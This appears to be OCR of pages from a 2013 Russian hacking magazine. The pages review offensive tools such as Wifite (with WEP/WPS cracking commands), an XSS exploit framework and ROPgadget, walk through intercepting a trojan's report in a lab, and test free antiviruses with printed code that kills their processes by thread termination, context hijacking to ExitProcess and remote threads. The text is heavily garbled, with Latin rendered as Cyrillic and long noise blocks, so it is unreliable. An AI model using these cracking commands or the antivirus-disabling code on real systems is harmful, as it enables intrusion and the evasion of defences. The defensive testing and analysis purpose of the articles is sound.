Взлом 
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Внимание! Информация представлена исключи- 
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ция за твои действия ответственности не несут! 




Дмитрий «Оіді » Евдокимов, 
Оідііаі Зесигііу 
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КРИПТА 

Если в приложении используется криптография, 
надо проверить, насколько правильно она реали- 
зована {огромное количество разработчиков за- 
ново изобретают велосипед и пишут свою реали- 
зацию АЕ5, естественно с кучей ошибок). С этой 
задачей часто приходится работать как при ис- 
следовании софта, так и при играх в СТР. 

ВІеТсНІеу представляет собой набор РуТНоп- 
инструментов, который может серьезно помочь 
в криптоанализе. Набор состоит из следующих 
консольных утилит: 

• ЫеісНІеу-апаІуге — анализирует файл с за- 
шифрованной информацией и пытается де- 
кодировать и идентифицировать полезные 
паттерны при криптоанализе; 

• Ыеісітіеу-епсобе — простой инструмент 
для кодирования произвольных данных, ис- 
пользует цепочку энкодеров; 

• Ыеісітіеу-сіесосіе — инструмент, выполняющий 
действия, обратные предыдущему инстру- 
менту; 

• ЫеІсНІеу-Іійр2ру — парсит НТТР-запрос (из 
зісПп или файла) и генерирует РуІІіоп -скрипт 
для отправки тех же или измененных данных; 

• ЫеІсИІеу-пехігапсІ — вычисляет состояние эк- 
земпляра иаѵа Вапбот сіазз, получив два по- 
следовательных значения от пехІІпЦ). 

Также доступны три РуІНоп-библ потеки, кото- 
рые могут быть весьма полезны. ВІоЫооІз может 
быть использована для автоматического опреде- 
ления наиболее вероятного алгоритма кодиро- 
вания; ЬиТСегІооІз содержит набор инструментов 
для манипулирования двоичными буферами 
шифрованного текста; СВС содержит различные 
инструменты для проведения атак на данные, за- 
шифрованные с помощью блочного шифра СВС. 



ѴѴІР1ТЕ Ѵ2 

ѴѴі-Рі-сети сейчас окружают нас везде: дома, 
на работе, в кафе, гостинице. Их стало очень 
много, а людей, разбирающихся в грамотной на- 
стройке, так много не становится. В итоге получа- 
ем идеальное пространство для атаки. 

ШЫе — это программа, написанная на РуИпоп 
и предназначенная для атак на беспроводные 
сети, защищенные ѴѴЕР, ѴѴРА или ѴѴРЗ. Приложе- 
ние работает в консольном режиме (в последней 
СІЛ- режим убрали). Особенности утилиты: 

* одновременная атака нескольких сетей; 

* последовательность взлома по уровню сиг- 
нала; 

* автоматическая деаутентификация клиентов 
для определения скрытого 551 Р сети; 

* фильтры для определения цели; 

* автоматическая смена МАС при атаке; 

* запись всех ѴѴРА кіапсізбакез в текущую дирек- 
торию; 

* ѴѴРА-деаутентификация; 

* возможность приостановки и возобновления 
атаки; 

* интеграция с геаѵег для взлома ѴѴРЗ. 

Пример запуска на взлом всех точек доступа, 
защищенных ѴѴЕР: 

. /міЕДе . ру -аіі -мер 

Для взлома ѴѴРЗ хендшейка по словарю 
тусІісМзІ: 

. /ыі5~Ее .ру -аіі --сіі сі /репіезі/^ 

ра з зыо гс] з/ыогсі 1 і 5 1 з /ту сі і с 1: ,Д з - ! 

Для корректной работы нужен установленный 
аігсгаск-пд. 



ВСЕ ЛЮБЯТ Х88 

Встречай новый проект от ОѴѴА5Р под названием 
Хепойх ХЗЗ Ехріоіі Ргатеѵѵогк. Данный инстру- 
мент представляет собой фреймворк для поиска 
и эксплуатации Сгозз Зііе Зсгірііпд уязвимостей. 
Для исключения ложных срабатываний из скани- 
рования Хепоііх использует встроенный сканер 
и три различных движка: Тгісіепі, ѴѴеЬКИ: и беско. 
На текущий момент инструмент имеет более 1500 
полезных нагрузок для обнаружения ХЗЗ и обхо- 
да ѴѴАР. При этом также реализован модуль сбора 
информации для разведывательно-подготови- 
тельных работ. 

В наличии есть атакующий ХЗЗ- модуль, ко- 
торый может быть полезен в тестах на проник- 
новение и создании ргооі о^ сопсері Выделю 
наиболее интересные возможности, которые 
предоставляет данный фреймворк: 

• угон соокіе; 

• рНізкіег; 

• іаЬпаЬЬіпд; 

• кеуіоддег; 

• НТМІ.5 РРоЗег; 

• ЕхесиІіаЫе Ргіѵе-Ьу; 

• иаѵаЗсгірІ ЗИеІІ; 

• геѵегзе НТТРѴѴеЬЗИеІІ; 

• Ргіѵе-Ьу Веѵегзе ЗІіеІІ; 

• Меіазріоіі: Вгоѵѵзег Ехріоіі. 

Не стоит забывать о множестве режимов ска- 
нирования: полностью ручной, автоматический, 
РОМ -сканер, сканер РОЗТ- запросов, сканер за- 
головков, фаззер и даже сканер скрытых параме- 
тров. 

Также нельзя не выделить целый набор аддо- 
нов, заточенных под Нге^ох: Пеѵегзе ЗЬеІІ, Зеззіоп 
Зіеаіег, Кеуіоддег, Ыпих СгебепйаІ Рііе Зіеаіег 
и Роѵѵпіоасі апб Ехесиіе. 






ХАКЕР 10/177/2013 




Г'-П.і*г ПО*- V г-с-и-і 'Ц 



.ОеГІ.ІЧ'’ ЕлЗвЛ.* ^5СІП 

К С* - 40'-- Міі2 

ё Щец: йаі і 
ИкТйА-й^ІВОТ 

I КІ-аь С* 1 1 
? :-н.-с-. с* іа 
1с :ЧЬсо: бл^т 

II И^н, лш 
іг НЬеп: екО 
А! Жаи. ОлЛ* 

ІА ЧТіт; Фн4 

НЬсе: :т:13 

ІЙ Яіі“Чі I :■! 4 + 

1 Т ВЛил; Зн-?* 

58 9.82238- Э&2246 



’вѵлигь'..:Л о ии;«р?_3іііки*і іѵ.-ои_і • с яг іі^лиаггѵ «.л»» ы ( .и_:і.і>*і 

ИЭ’ гМг^11«( к.'м ■ ■ ійу*ѵч *'«* 50 «V.. 
чг:ѵ=:н-,;і, гогс-ѵ 1 =М Г Ш» ?Г- Ѵ ' ' 

1 г^Г'П: 

УіІГАКір* 

Ѵі -ітд^ асе- 

^ І.ЧРЛ-.ІМ 

Сгг.-і и- Ь5;,дп 



^шіс+.Іоп таіп {) { 
ѵіг йссв - иинод] 
іі494№іі«94''і-'"9Ъц4‘ 
и 1 230 Ьц 4 23 ЬЛ 1 5 
м4чІ7 93&*и4гі6с ! 
МЗбсЧиІІЭБ^иСЭСеР 
н'7 7 6Ъ ' 1 1 й і и Й Ч т 1 1 Б 4 6 Ь‘ 



'■1 Кійіі 

'■ : А 1 1 1— «-і ■ 

! 1 Ші’&э' 



)Н НІ 

:т 

; г; I . ■: 

,11 1В 



.".I 



і'&смі і_Ги' "ггі'Ѵеріс* 
ІмсЬ 51г-гф і 

РЬзНОЫѳсб 
цаосЫде* 

Т (Г- Н.-ьпЬя 
п'Лкг-. Іаді 



ішОО 
^иА 
11 Ій 
4<і •» О 

5о7 0мі414ЪНиСТ4*Ѵи 
МзЗІ ' иЙ(і7 О'+и 4 й79^іЦ 



МІІ 

йБЙ 

Ё %» 
Уи 



- ІРІ * 

Тл‘ И 

7*) ѵ*й№’ фіЯ^іЦ/ 

Т' "ЭГГР'-«?_ р 1: 
^йт_Оыг^рі 



■ «•• 1 'ф'І Г.^ГТТГг", 

йЬп# 

АЬіі, 1 Іліѵм ■ 0.4 . 1 і 



и13 50Цч57 44^і.іСО7%иб5 31Ьгі!ІЙСаЧц7 7бйУі]ЙЙ1іУи , 30 4г^гіЗЭеЬ^:[іЛ561іііі416Ь і кіг 1Л4Л% 
ибЗ б 4 %и 543 4 93 5%*6*7 5Ш 6Ь %и4 16 ГУ м3 53 4%и1 з5 1 %и 514ЬУм6е7 6 Ч «3 4бЬ%иЗО Ао% 

ибе4ЬУи 4 1 бЬУ іі7 5 4 РмЗ 54с %и6 а 5 1 ч иібеЛ ЬУ іі4 7 6Ь Чпібебс У и 4 36ЬУ*і7 аЁ А%ийс 4ЬУи7 3 4 Э У 
и5і6мУи56ЭІУ«і4іаб4Уи3073%и4 ГЗі^и523<) , ^и4о:44^и7Эб1>%іі447 0Ущ4-с70Уи594 5%и415©У 
иЭАбВ*иісісЭтбЭ4ЬЗпі4б1 0Уи4с6сУи524ЬУп51 50Чи6в6оУи6с4^Уи504ЪЧи3769*тбй7вУ 
и 57 ЗЬ '■иЬиѴ 9і;«і6І>4ЬУи4%іЗО%и 77 50 ■чи7 ! /С^«437 ОУи6и30%и7 54ЬУи5 738Уи61 4с 544 1 ■* 
и7В71-4и537бУш56 50%ибсЗбУи7Э4&--чі4е6ѲУи6Ь63Уи517 0-Чи566Ь%и3230%и6с4В-'іи4сІЗОч 
о.Ъ7 Ъл*и4 17 4 т,иЭ Ъ Ь 1 % и 4 13 Ь \ о7 9 68 *и4<16 «У и і 6 5 о У и 7 №6и*и 4 № 7 % и4 641 Ч м7 2 37 у о 3 44 а- 



2 * АіІЫдмре И-?міа< 

•* ’.Ѵиѵ. 1 - Ричи» ііміягі 
Н кЬ 1-сг_кгт С ■ (у ОЬр . ! і. 
о І-^ Ілркаеѳ ;.ім * 



г эрік:еЭіса , 'і 
Нгіг >.ѵчі чгаят 

Ч сі- : ЗЬ ^іТ _ г 



;?Б4Уи 57 61Уи4150чи7 278%а6354Уи4244мі6450%и76ТаУиЗб4ГУиб?4Г5 
1б8Ум'1054Уи315еУц317ЬУи74 64УоЗ^Ь*?Уи5^4аУм734ЬУи64 44Уи4 2ЫУ 
ІЁ4%и3435%и51&ГУи326Э%и435ЗДщ7 045Уиб46е%іі34ЁеУи3 530Уи%1ЭВУ 




3сгечеіа;і0 1;';: 



Ёт»«1эі С ^эдк?! . 



і 1 ал П з О 



.іи.<И- з О 



Д Г -6 1--.51 с 



Автор: Оаѵісі 2іттег 

ЦИІ: аоо.оІ/еСВКаѴѴ 

Система: ѴѴіпсІошз 



КОПАЕМСЯ В РОР 



РОР уже давно стал излюбленным 
форматом среди вирусописате- 
лей и багхантеров. Так что часто 
приходится либо изучать чей-то 
РОР-эксплойт, либо писать свой :). 
И делать все это хочется в удобной 
среде. В этом как раз и помогает 
РОР ЗДеапгі Оитрег. Это бесплатный 
инструмент для анализа вредонос- 
ных РОР-файлов, он также предна- 
значен для вспомогательных задач 
по разработке эксплойтов под РОР- 
ридеры. 

В основном инструмент заточен 
для работы с обфусцированным 
^ѵаЗсгірГом, низкоуровневыми за- 
головками РОР, объектами и шелл- 



кодами. А для удобной работы с по- 
следними присутствует интеграция 
с зсбЬд (от того же автора, рассмо- 
трен нами в предыдущих номерах). 
Что доступно под капотом; 

* поддержка множества фильтров; 

* применение цепочки фильтров 
к потоку; 

* просмотр заголовков, объектов 
и потоков; 

* ЗаѵаЗсгірі-деобфускатор; 

* генерация отчетов. 

При этом инструмент имеет свои 
скрипты для автоматизации рутин- 
ных задач и плагины для расширения 
начального функционала. 
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ВОИН СПАРТЫ 

Зрагіу — это простой и надежный инструмент 
с открытым исходным кодом для проверки 
веб-приложений, использующих архитектуры 
ЗИагеРоіпІ; и РгопІРаде, Так уж сложилось, что ад- 
министрировать подобные приложения довольно 
нелегко, поэтому Зрагіу может оказать поистине 
неоценимую помощь. Этот инструмент предо- 
ставляет все необходимое для удобного сбора 
информации, проверки прав разграничения до- 
ступа, идентификации критичной информации 
в файлах по умолчанию. При необходимости тул- 
за даже сможет продемонстрировать эксплуата- 
цию для найденной уязвимости. 

Основной функционал версии 0. 1 : 

• детектирование основных версий ЗбагеРоіпІ: 
и Ргоп^Раде; 

• дамп паролей из открытых файлов конфигу- 
рации; 

• сканирование уязвимых ЗбагеРоіпѴРгопіРаде- 
сервисов; 

• проверка уязвимых директорий; 

• проверка установленных файлов и их прав; 

• запрос ВРС-сервиса; 

• перечисление файлов; 

• проверка возможности загрузки файлов. 

Так что теперь поиск и проверка таких файлов, 
как зегѵісе.рѵѵб, зегѵісе.дгр, абтіпівігаіогз.рѵѵсі, 
аиіі'іогз.рѵѵсі и изегз.р\л/б, происходит автомати- 
чески. 

В следующих версиях автор собирается доба- 
вить новые проверки пейлодов на основе асітіп. 
сііі и аіЯІіог.сШ. Ну и естественно, в новой версии 
появится информация о свежих уязвимостях. 

Инструмент впервые был официально пред- 
ставлен на ВІаск На! ЭЗА АгзепаІ 2013 в Лас- 
Вегасе. 



АНАЛИЗАТОР ДАМПОВ ПАМЯТИ 

Программу Метогуге в кругах компьютерных кри- 
миналистов знают не понаслышке. Это мощней- 
шее средство анализа памяти для многих стало 
частью джентльменского набора, настоящей про- 
граммой плие! Наѵе, которая не просто лежит про 
запас для подходящего случая, а действительно 
часто используется. Что мы можем получить, ис- 
пользуя Метогуге: 

* полный образ всего диапазона системной 
памяти (без использования АРІ-вызово8), со- 
храненный в файл для дальнейшего анализа; 

* дамп адресного пространства любого процес- 
са, включая список загруженных ЭЦ_ и ЕХЕ, 
кучу и стек (этот дамп можно дальше исследо- 
вать в дизассемблере); 

* образ всех загруженных драйверов или только 
некоторых из них; 

* полный список всех процессов, включая 
спрятанные руткитами, причем для каждого 
процесса есть возможность определить все 
хендлы (например, используемых файлов или 
ключей реестра), сетевые сокеты, импортиру- 
емые и экспортируемые функции и так далее; 

* все строковые переменные, используемые 
процессами; 

* полный список всех драйверов, в том числе те, 
которые маскируются малварью; 

* перечень всех модулей ядра; 

* перечисление всех установленных хуков (они 
часто используются малварью). 

Инструмент достаточно уникальный в своем 
классе, и единственным его конкурентом можно 
назвать ѴоІабІИу И то скорее лучше их использо- 
вать в связке при анализе инцидентов и мал вари, 
Так что это точно тиз! йаѵе в наборе специалиста 
по расследованию инцидентов. 



ПОР-ПОР-ЕЮР-ПОР 

Тема поиска ПОР гаджетов и цепочек уже неодно- 
кратно освещалась в данной рубрике, но иссле- 
дователи не стоят на месте, и на сцене появля- 
ются все новые и новые инструменты, которые 
значительно упрощают процесс написания ПОР- 
шелл -кодов. 

ПОРдабде!, как нетрудно догадаться, — это 
инструмент для поиска ПОР- гаджета в в ЕІ_Р (І_іпих) 
и РЕ (ѴѴіпбоѵѵз) бинарных файлах. Программа пол- 
ностью написана на Си. На текущий момент есть 
поддержка І_іпих х86/х64 и ѴѴІпсіоѵѵз х86. 

При этом (пока только) для операционной си- 
стемы Ыпих реализована такая фишка, как авто- 
матическая генерация ПОР рауіоаб! Инструмент 
не просто ищет полезные НОР-гаджеты, но и сра- 
зу конструирует из них последовательность, 
реализующую вызов ехесѵе() с произвольным 
набором параметров. Для ѴѴіпбошз данный функ- 
ционал находится в стадии разработки. 

Из интересных фишек также можно выделить: 

* поддержку Іпіеі и АТ &Т синтаксиса; 

* поддержку фильтров при поиске НОР- 

гаджетов; 

* поиск конкретных инструкций; 

* поддержку нескольких форматов вывода; 

РуІМол, РегІ, С, РНР, 

В качестве альтернативных НОРостроителей 
можно вспомнить ПорМе, Мопа.ру для ІттОЬд 
и мастодонта ОрІіНОР, представленного на ВІаск 
На! ЭЗА 2013. То, что появился еще один инте- 
ресный инструмент, не может не радовать. Тема 
автоматизации построения гаджетов и их це- 
почек становится все более актуальной среди 
эксплойтописателей. Ведь не за горами время, 
когда без ПОР опіу шелл -кода будет не обойтись 
(как уже сейчас в Ю5). 










* ' 














ВСТУПЛЕНИЕ 

Сегодня мы с тобой поиграем в одну игру. Пред- 
ставь, как будто мы вирусные аналитики с боль- 
шой зарплатой и бесплатной кофемашиной. 
Перед нами стоит задача перехватить отчет тро- 
яна об успешной установке и перенаправить его 
на другую почту, а также узнать, кому он предна- 
значался. Неплохая задача? Поехали! 

УДАЛЕННЫЕ АДМИНИСТРАТОРЫ 

Для начала отметим, что средства, предназна- 
ченные для удаленного доступа на чужие ма- 
шины, сейчас весьма популярны. В публичном 
доступе они представлены довольно широким 
ассортиментом. Чаще всего встречаются НМ5, 
ОагкСотеі, СуЬегОаІе, ХТгете ВАТ 
В число их функций может входить: 

* полный доступ к системной информации; 

* контрол ь над все м и п ро цессам и ; 

* просмотр и изменение регистра; 

* удаленное управление (ВРР); 

* выполнение произвольного кода; 

* просмотр/изменение/копирование/удаление 
файлов; 

* прослушка/запись микрофона и веб-камеры; 



• доступ к паролям браузеров (социальные 
сети, почта, банкинг); 

■ доступ к компьютерам твоей локальной сети; 

■ принтер, роутер и много другого. 

В данной статье мы рассмотрим троян на ос- 
нове легального программного продукта компании 
ТеИопІТ. Его отличают доступность, надежность 
и высокий «пробив». Эти положительные качества 
обеспечили его высокую популярность в узких кру- 
гах любителей приключений, Наша задача — пере- 
хватить отчет трояна о его успешной установке 
и перенаправить на другую почту, а также узнать 
изначального получателя, то есть мастера. 

НАСТРОЙКА ОКРУЖЕН ИЯ 

Для решения такой задачи нам понадобится вир- 
туальная среда. В данном случае мы используем 
бесплатный программный продукт под названи- 
ем ѴігІиаІВох { жк й 1 * ), Скачиваем, 
устанавливаем, если возникнут сложности — 
обращаемся к инструкции на сайте. Запускаем, 
создаем две виртуальные машины под управле- 
нием ѴѴіпбоѵѵз. Первая будет перехватчиком, вто- 
рая — предназначена для заражения (Иопеуроі:). 
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ПМ5 не троян, 
а вполне легальное 
и высококачествен- 
ное программное 
обеспечение Что 
не мешает плохим 



Настройки перехватчика 



Настройки Мопеуроі 



людям использовать 
его, а также модифи- 
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цированные версии 
клиентов ТеатѴіеѵгег 
и Яабтіп, в своих 
нехороших делах. 
Обнаружить такие 
трояны сложно из-за 
«чистоты» исходной 
программы. 
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Кредитные кэріь Апіфа^анка - ЫІаЬапІсти ■ 100 дней ’з аюі«иая ентіие нашічны^ Дс КЮ ОСЗр Ззрйгд и ш д Ди 



Пучеиу нее иуіузіауг. і л у уСе^вгееге 1 



Мвшриіаіог уста нов п^н нл удаленном компьютере, новый іпйѳгшНС г> а 

получен: 5-С7В5А0АЕ-0АЭѲ-43Е1 в - _ = • 

ГйЫ*|*1Г Сшр. ігтІ«.Д'І4‘л-аі; : Е*Я1 'ій&йі иНІМІг.*Г11Ій ШВСйгЬй^І № 1 1 05 ■ I ШНуТу УЗІ^Д) К * 
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ОЁыу&пеніЕЯ 0 



СиЬірІШ 4>п нл у^*І^І*<ЧПМ УСУіПИЧ; ггрг уЛІЛМПНПРЦ И ПГІуі2(ГН РрчіПЙ МіИНстЛпіПЕ Эузінт Илч'рирпплч ЧРЛІЧіЙ 

ішенгѵСрііклпз^ ’Іійеіпгі-ЮГ 

ѵ всрЧйлом: олан 4 ііы 

ТЪрдіпу ТЗЫШ2Г 

Клі й ііші»'иаінгнш : г -і'Т51ТІ.І 
Нмнеячру* крцпылтфл '■-РГПРАТГТАСК 



Данной пііСілю СПСнОрнООСЭіЮ аО№ЭТичОСиИІ на ІрсОуйз РГЕКЛО 

Виннзні>«! Соксвм-і'ѵ дяимі* пмсин е р-здэтьом икч пгм ѵ.л агягтв т к ом №:<«т содфржіітъ- ірнфорч аіціс. 
оо 5 аолян 5 ч 4 у«| полуиіііі. удалвмниадосгул ц иоиявютору 



Ьилайн: Защищенное 

ПОДУ.ПІОЧ'НМИІ* 

ч+аби лол^хея-уел усл>т^ 4 й 
несводим 

тупые мб', іС ;е ИЛИ (виркфумі 

ІіЗІІ Іі*.р-І-і|н Ні 

5ианес Ёоі границ 
настроят» удаленннП доступ н 
■мігі 

ИИ 1 КІ(Шгі 1 |к^І Нг|ЧГ,н [МЧЦННВЦ 
^ІРГГГЕпЛ 

■ЯТГАг ПІіСІйЗйЙ сот 

Сйі.'орзаэона Пь-Т-щсни 

А А гііЩІІЧНІІКІП' Дгірні ?- ||'Г Чі- Ч'гІ 





Весь материал предо- 
ставлен в образова- 
тельных целях. Крайне 
не рекомендую играться 
с пакетами гтапаув 
в Вигр ЗиЛе е целях спа- 
ма или других противо- 
законных действий. 



Наш пакет 



Письмо на почту 



Почему так, ведь все можно сделать на одной? 
Можно, но лучше не стоит — некоторые умель- 
цы делают защиту от подобного вида контра- 
так, и, создав две машины, мы избавим себя 
от лишних хлопот. Далее нам необходимо уста- 
новить на наш перехватчик собственно инстру- 
ментарий. Качаем и устанавливаем Вигр Зиііе 

ДШіШ ). 

Переходим к настройке сети (Устройства — + 
Сетевые адаптеры). Перехватчик имеет два сете- 
вых интерфейса: 1 ) ѴѴАЫ — ГМАТ, имеет выход в ин- 
тернет; 2) І_А№ ( 192. 168.0. 1 ) — локальная сеть ОѴѴ/ 
□N5 (ІР МАИ интерфейса), имя іпіпеі, неразбор- 
чивый режим — разрешить ВМ. Вторая машина 
имеет только 1_АЫ -интерфейс с ѲѴѴ, равным ІР ЦМ 
перехватчика. Также сразу можешь установить 
прокси в настройках ІЕ на 192. 168.0. 1 порт 80, ак- 
тивировав галочку «Использовать для локальных 
подключений», [де взять экземпляр трояна, гово- 
рить не буду :). 

ЗАПУСК И ПЕРЕХВАТ 

Теперь, когда базовые настройки законче- 
ны, запускаем на первой машине Вигр Зиііе 



и ѴѴігезИагк, на второй — наш троян. Смотрим 
лог ѴѴігезІіагк, наблюдаем возросшую сетевую 
активность зараженной машины. Троян срабо- 
тал и пытается связаться с сервером, в нашем 
случае он ищет разрешение имени ТекІопІТ ши- 
роковещательным запросом на адрес 255. На- 
блюдаем, записываем адреса и порты. Теперь 
переходим к настройкам Вигр Зиііе, выставляем 
их в соответствии с картинкой «Настройки пере- 
хватчика». 

Ловушка для пакетов установлена, можно 
переходить к следующему этапу. В зараженной 
машине нажимаем клавиши <ѴУіл + В> и наби- 
раем команду %ѵѵі пб іг%/ зузіетЗ 2/6 гі ѵегз/еіе / 
ІЮ5І5, открываем файл в блокноте и вписываем 
имя сервера, который ищет наш троян, указав, 
что он расположен на Ц\М -адресе нашего пере- 
хватчика ( 192.168.0.1 ). 

Сохраняем, закрываем, изменения вступа- 
ют в силу немедленно. Троян получает заветный 
ІР-адрес, на котором якобы расположен иско- 
мый сервер. Как результат, великий и могучий 
Вигр ЗиЛе словил первый пакет іпеі ісі поШу. 
рбр?1ез1=1 . Ничего особенного тут нет, просто те- 
стовый запрос, пропускаем. 



А вот и он, второй пакет, который содержит 
уже куда более интересную информацию. Здесь 
и почтовый адрес нашего любителя приклю- 
чений (троян был настоящий, почтовый адрес 
на картинке изменен), пароль и номер для до- 
ступа к нашей зараженной машине, имя. Теперь 
в дело вступает сила Вигр — мы можем держать 
пакет столько, сколько потребуется, а также из- 
менять его содержимое, что мы и сделаем, за- 
менив адрес направления отчета на свой соб- 
ственный. Нажимаем Рогѵѵагб и бежим смотреть 
почту :). 

Все получилось! Письмо пришло, задача вы- 
полнена. Мы успешно перехватили отчет, внеся 
в него изменения и не нарушив работоспособ- 
ности. На этом практическая часть статьи закан- 
чивается. На вопрос, почему все это получилось 
так «просто», у меня есть ответ: причина кроется 
в использовании авторами программы протокола 
НТТР. 

ЗАКЛЮЧЕНИЕ 

То, что мы тебе сегодня продемонстрировали, 
по сути, самый настоящий еазу баск, Впрочем, 
главное в нашем деле не процесс, а результат :). 
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Вся информация предо- 
ставлена исключительно 
в ознакомительных 
целях. Ни редакция, 
ни автор не несут от- 
ветственности за любой 
возможный вред, при- 
чиненный материалами 
данной статьи. 



17 халявных 
антивирусов 
между молотом 
и наковальней 

ІпТоптаІюп тизі: Ье Ігее, 
поэтому бесплатные 
антивирусы — наш вы- 
бор. Правда, перед тем, 
как свой выбор сделать, 
нужно все хорошенько 
проверить. Например, 
их способность к само- 
обороне. Как может ан- 
тивирус защитить твою 
машину, если он и себя 
не может обезопасить? 



На этот раз для тестирования мы отобрали аж 
семнадцать антивирусов, которые объединя- 
ет одно: они все бесплатные. А проверим мы их 
на предмет устойчивости процессов и сервисов, 
которые создаются антивирусами для их нор- 
мальной работы. 

ПРЕДСТАВЛЯЕМ ИСПЫТУЕМЫХ 

* 360 Іпіегпеі Зесигііу 2013 

* АсІ-Аѵѵаге Ргее Апііѵігиз + 

* Атііі Ргее Апііѵігиз 

* Апѵі Зтагі Оеіепсіег Ргее 

* аѵазі! Ргее Апііѵігиз 

* АѴѲ Апіі-Ѵігиз Ргее 2013 

* Аѵіга Ргее Апііѵігиз 2013 

* Вазсіи Апііѵігиз 2013 

* Віісіеіепсіег Апііѵігиз Ргее Есііііоп 

* Сотосіо Апііѵігиз 2013 

* КіпдзоИ Апііѵігиз 2012 

* МісгозоИ Зесигііу Еззепііаіз 

* Рапсіа СіоисІ Апііѵігиз Ргее 

* Ргеѵепіоп Апііѵігиз Ргее 

* Нізіпд Іпіегпеі Зесигііу РегзопаІ 

* РоЬозсап Іпіегпеі Зесигііу Ргее 

* ІопеАІагт Ргее Апііѵігиз 



не очень известных производителей, которые ши- 
рокого распространения в нашей стране не полу- 
чили. 

МЕТОДИКА ТЕСТИРОВАН ИЯ 

Думаю, для тебя не секрет, что каждая антиви- 
русная программа при своем функционировании 
создает несколько процессов и сервисов, в кото- 
рых и заложен функционал по противодействию 
вредоносному воздействию. 

Для проверки была написана небольшая ути- 
лита, которая может уничтожать процессы не- 
сколькими способами и останавливать или уда- 
лять сервисы. 

Способ 1 . Уничтожение процесса 
с помощью АРІ ТегтіпаіеРгосебв 

С этим способом все предельно ясно и по- 
нятно. Используем стандартную АРІ -функцию 
ТегтіпаІеРгосезз по ее прямому предназначению 
и убиваем нужные процессы. 

Способ 2. Уничтожение всех потоков про- 
цесса с помощью АРІ ТегтіпаіеТНгеасІ 

Ищем все потоки нужного нам процесса и пооче- 
редно их уничтожаем, применив для этого специ- 
ально обученную АРІ -функцию ТегтіпаІеТІтгеаб: 



Как видим, в списке есть как довольно рас- 
пространенные на территории нашей необъят- НАМРІ. Е Н5 па рТІігеасІ - <-■ 
ной родины антивирусные пакеты, так и изделия Сгеа1:еТоо1Ие1р325пар5Ііо'1:.-‘ 
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(ТН32С5 5І\ІАРТНКЕА0, ре . ТЬ32Ргосе55Ю) ; 

// Перечисляем потоки 

ТЬгеасІ 3 2 Р і п5Т (Іі5п а рТ ИгеасІ, &Те ); 

йо_{ 

іТ (Те.ТІі320іл/пегРгосе55І0 == ре.ТІі32Ргосе55І0) 

{ 

НАШІ.Е МТЬпеад = ОрепТИгеагі(ТНКЕАО^КМІМАТЕ л ^ 

РА1.5Е л 1:е .ИІп32ТЬгеасІІР) ; 

// Уничтожаем поток 

ТегтіпаЕеТІігеасІ(ІіТІтгеасІ,Ѳ) 

} 

> 

мИ]^_(ТЬгеасІ32Мех1: ( ИБпарТИгеасІ &Те )Хі 

Способ 3. Модификация контекста 
потока на адрес АРІ ЕхііРгосе$$ 

С помощью АРІ-функций Сгеа1еТооІІпеІр325пар5Ііо1:, ТМгеасІ32Ріг5І; 
и ТЬгеасі32ІЧехі перечисляем потоки нужного нам процесса, поочередно их 
замораживаем, затем пишем в ЕІР в контексте потока адрес АРІ-функции 
ЕхііРгосезз и далее возобновляем выполнение потока: 

НАШІЕ ИБпарТНгеасІ = _±±_ 

Сгеаі:еТоо1Іте1р325пар5Ноі>-< 

(ТН32С5_$ІЧАРТНКЕА0, ре . і:Ь32Ргосе5 5І0) ; 

// Перечисляем потоки 

ТИгеасІ32Ріг5І: ( ІіБ парТІіг еас І . &Те): 

СІ О { 

1Т (1е.±И320мпегРпосѳ55ІР -= ре.ТЬ32Ргосе55ІР) { 

НАШІ.Е ШИгеасІ = ОрепТИгеасІ (ТНКЕАР 01ІЕКУ ІІЧРОКМАТІОМ 

ТНКЕ АР СЕТ СОЩЕХТ | ТНКЕАР 5ЕТ СОЦТЕХТ. РА1.5Е. «-■ 

Те .ТІт32ТбгеасіІР)_т 

СопТехТТНгеаф.СопТехТР1аё5 - СОМТЕХТ^СОМТКОІ. ; 



// З амораживаем п оток 

5изрепсіТИгеасІ(ЫІігеасІ)і 

6еТТЬгеае1Соп1:ехТ(ІіТІігеасІ . &СопТе хТ ТЬгеасІ ) ; 



// Пишем в ЕІР адрес АРІ ЕхіТРгосезз 

СогѵЬехТТІігеасІ . Еір = (Р ЫОКР ) Е хіТРгосезз; 

5еТТНгеас1Соп1;ехТ(1пТНгеас1, &СопТехТТИгеасІ) ; 

// Возобновляем поток 

КезитеТбгеасІ(ІіТ}іпеасІ) ; 

1 

_} 

ыНіІе (ТІігеа сІ32М ехТ(Іі5пар ТЬ геас1. &і:е Л : 

Способ 4. Создание удаленного потока с вызовом АРІ 
ЕхііРгосеза 

С помощью АРІ-функции РШСгеаіеІізегТіігеасІ создаем в нужном процессе по- 
ток, в котором вызываем ЕхіІРгосезз: 

// Ищем процесс с н ужным именем 

НАШ1.Е РіБпарБНоТ = СгеаТеТоо1Ие1р325пар5ИоТн 

(ТН32С5_5МАРРК0СЕ55 , 0); 

Ргосе5532Р1г5Т(115пар5Но1: л &ре); 

4о_1 

і± (_Тс5стр(ре , згЕхеРіІе, Рпосез5Мате)==0) { 

НАШІ-Е 6РГ0СѲ55 = 0репРгосез5(РК0СЕ55_СКЕАТЕ_ТНКЕАР | 
РК0СЕ55_ѴМ_0РЕКАТІ0І\І | РК0СЕ55_ѴМ_ЫКІТЕ Л Ѳ Д ^ 
ре.ТІі32Рпосе55ІР) ; 

// Адр ес АРІ- функции ЕхіТРгосезз 

РЫОК Р ЕхіТРг осеззАсІсЗ г = (РІлІОКР} ЕхіТРго сезз ; 

_азт 

і 

ріІБІТ 0 
ри5Іі 0 
ризЬ 0 

ріі5Іг ЕхіТРгосеБзАсІсІг 

ризб 0 

ризЬ 0 

ризб 0 

ризіз 0 

ризіі 0 

ризб НРгосезз 



Уничтожение процесса с помощью АРІ ТегтіпаІеРгосезз 


ТР 


Уничтожение всех потоков процесса с помощью АРІТегтіпаІеТЕгеасІ 


тт 


Модификация контекста потока на адрес АРІ ЕхіІРгосезз 


ЕР 


Создание удаленного потока с вызовом АРІ ЕхіІРгосезз 


ТЕ 


Закрытие всех хендлов открытого процесса с вызовом АРІ-функции 
РирІісаІеНапбІе 


сн 


Последовательный вызов АРІ-функций СгеаіеІоЬОЬ]есі, 
АззідпРгосеззТоХоЬОЬіесіиТегтіпа^оЬОЬІесі 




Посылка ѴМ ОІІІТ окну процесса 


да 


Остановка сервиса 


25 


Удаление сервиса 


05 



Способы уничтожения процессов и сервисов, использованные нами 
при тестировании 

саіі КТІСгеаТеІІзепТбгеасІ 

> 

} 

і 

мИіХе (Ргосе5з32іМехТ(Іі5пар5ІіоТ > &ре))^ 

Способ 5. Закрытие всех хендлов открытого процесса с вызо- 
вом АРІ-функции СирІісаІеНапсІІе 

